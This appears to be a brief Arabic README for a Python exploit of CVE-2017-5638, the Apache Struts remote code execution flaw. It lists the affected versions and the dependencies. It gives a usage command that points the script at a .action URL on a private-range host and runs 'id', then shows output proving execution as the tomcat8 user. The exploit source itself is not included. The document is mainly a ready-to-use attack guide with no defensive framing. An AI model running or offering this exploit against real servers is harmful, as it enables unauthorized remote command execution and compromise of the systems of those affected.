
استغلال لـ CVE-2017-5638. يعمل هذا الاستغلال على الإصدارات 2.3.5-2.3.31 و2.5 – 2.5.10
هذا الاستغلال مخصص لـ CVE-2017-5638. يعمل على الإصدارات 2.3.5-2.3.31 و2.5 – 2.5.10
optparse, requests
يمكن استخدام هذا الاستغلال على النحو التالي:
$ python3 CVE-2017-5638ApacheStruts.py -u http://10.129.187.188:8080/Monitoring/example/Welcome.action -c id
b'uid=115(tomcat8) gid=119(tomcat8) groups=119(tomcat8)'
لكي يعمل، يجب توجيه الاستغلال إلى ملف .action